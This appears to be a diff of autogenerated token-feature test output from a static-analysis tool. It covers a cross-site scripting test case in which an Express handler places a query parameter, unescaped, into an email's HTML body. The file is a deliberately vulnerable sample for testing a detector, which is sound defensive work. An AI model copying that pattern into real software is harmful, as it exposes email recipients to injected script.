nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:19 | express() | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:11 | backend | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:11 | backend | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:11 | backend | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:11 | backend | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:34 | backend | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:34 | backend | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:34 | backend | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:34 | backend ... ckend') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:34 | backend ... ckend') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:5:4:34 | backend ... ckend') | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:21 | require | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:34 | exceptional return of require('./backend') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:34 | exceptional return of require('./backend') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:34 | exceptional return of require('./backend') | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:34 | require('./backend') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:34 | require('./backend') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:4:15:4:34 | require('./backend') | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:4:23:4:33 | './backend' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/DomBasedXss/nodemailer.js:4:23:4:33 | './backend' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/nodemailer.js:4:23:4:33 | './backend' | calleeImports | | | autogenerated/Xss/DomBasedXss/nodemailer.js:4:23:4:33 | './backend' | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/nodemailer.js:4:23:4:33 | './backend' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/nodemailer.js:4:23:4:33 | './backend' | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:6:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:6:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:6:3 | app | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:6:8 | app.post | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:6:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:6:8 | app.post | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:15:2 | app.pos ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:15:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:15:2 | app.pos ... });\\n}) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:15:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:15:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:1:15:2 | exceptional return of app.pos ... });\\n}) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:5:6:8 | post | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:5:6:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:5:6:8 | post | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:10:6:27 | '/private_message' | CalleeFlexibleAccessPath | app.post | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:10:6:27 | '/private_message' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:10:6:27 | '/private_message' | calleeImports | express | @@ -14289,6 +104032,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:6:10:6:27 | '/private_message' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:10:6:27 | '/private_message' | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:10:6:27 | '/private_message' | receiverName | app | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | backend | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | backend | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | backend | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | backend | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | backend | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | nodemailer | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | nodemailer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | nodemailer | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | nodemailer | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:6:29 | nodemailer | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | 'arguments' object of anonymous function | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | (req, r ... });\\n} | calleeImports | express | @@ -14296,6 +104054,71 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | (req, r ... });\\n} | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | exceptional return of anonymous function | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | exceptional return of anonymous function | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | return of anonymous function | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:30:15:1 | return of anonymous function | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:31:6:33 | req | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:36:6:38 | res | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:36:6:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:36:6:38 | res | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:36:6:38 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:6:36:6:38 | res | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:15 | transport | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:15 | transport | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:15 | transport | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:15 | transport | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:15 | transport | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transpo ... ort({}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transpo ... ort({}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transpo ... ort({}) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transpo ... ort({}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transpo ... ort({}) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transport | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transport | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transport | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transport | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:7:7:48 | transport | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:28 | nodemailer | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:28 | nodemailer | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:28 | nodemailer | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:28 | nodemailer | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:28 | nodemailer | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:44 | nodemai ... ansport | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:44 | nodemai ... ansport | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:44 | nodemai ... ansport | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:44 | nodemai ... ansport | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:44 | nodemai ... ansport | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | exceptional return of nodemai ... ort({}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | exceptional return of nodemai ... ort({}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | exceptional return of nodemai ... ort({}) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | exceptional return of nodemai ... ort({}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | exceptional return of nodemai ... ort({}) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | nodemai ... ort({}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | nodemai ... ort({}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | nodemai ... ort({}) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | nodemai ... ort({}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:19:7:48 | nodemai ... ort({}) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:30:7:44 | createTransport | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:30:7:44 | createTransport | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:30:7:44 | createTransport | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:30:7:44 | createTransport | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:7:30:7:44 | createTransport | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:7:46:7:47 | {} | CalleeFlexibleAccessPath | nodemailer.createTransport | | autogenerated/Xss/DomBasedXss/nodemailer.js:7:46:7:47 | {} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/nodemailer.js:7:46:7:47 | {} | calleeImports | nodemailer | @@ -14305,6 +104128,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:7:46:7:47 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/DomBasedXss/nodemailer.js:7:46:7:47 | {} | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:7:46:7:47 | {} | receiverName | nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:11 | transport | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:11 | transport | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:11 | transport | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:11 | transport | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:11 | transport | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:20 | transport.sendMail | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:20 | transport.sendMail | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:20 | transport.sendMail | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:20 | transport.sendMail | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:8:20 | transport.sendMail | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | exceptional return of transpo ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | exceptional return of transpo ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | exceptional return of transpo ... OK\\n }) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | exceptional return of transpo ... OK\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | exceptional return of transpo ... OK\\n }) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | transpo ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | transpo ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | transpo ... OK\\n }) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | transpo ... OK\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:3:14:4 | transpo ... OK\\n }) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:13:8:20 | sendMail | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:13:8:20 | sendMail | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:13:8:20 | sendMail | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:13:8:20 | sendMail | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:8:13:8:20 | sendMail | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:8:22:14:3 | {\\n f ... OK\\n } | CalleeFlexibleAccessPath | transport.sendMail | | autogenerated/Xss/DomBasedXss/nodemailer.js:8:22:14:3 | {\\n f ... OK\\n } | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/nodemailer.js:8:22:14:3 | {\\n f ... OK\\n } | calleeImports | nodemailer | @@ -14314,6 +104162,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:8:22:14:3 | {\\n f ... OK\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/DomBasedXss/nodemailer.js:8:22:14:3 | {\\n f ... OK\\n } | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:8:22:14:3 | {\\n f ... OK\\n } | receiverName | transport | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:8 | from | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:8 | from | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:8 | from | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:8 | from | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:8 | from | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:9:5:9:33 | from: ' ... le.com' | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:9:11:9:33 | 'webmas ... le.com' | CalleeFlexibleAccessPath | transport.sendMail | | autogenerated/Xss/DomBasedXss/nodemailer.js:9:11:9:33 | 'webmas ... le.com' | InputAccessPathFromCallee | 0.from | | autogenerated/Xss/DomBasedXss/nodemailer.js:9:11:9:33 | 'webmas ... le.com' | InputArgumentIndex | 0 | @@ -14324,6 +104187,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/nodemailer.js:9:11:9:33 | 'webmas ... le.com' | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | | autogenerated/Xss/DomBasedXss/nodemailer.js:9:11:9:33 | 'webmas ... le.com' | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/DomBasedXss/nodemailer.js:9:11:9:33 | 'webmas ... le.com' | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:6 | to | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:6 | to | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:6 | to | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:6 | to | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:6 | to | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | enclosingFunctionBody | req res transport nodemailer createTransport transport sendMail from webmaster@example.com to backend getUserEmail req query receiver subject Private message text Hi, you got a message from someone. req query message . html Hi, you got a message from someone. req query message . | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:5:10:48 | to: bac ... ceiver) | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:10:9:10:15 | backend | contextFunctionInterfaces | | +| 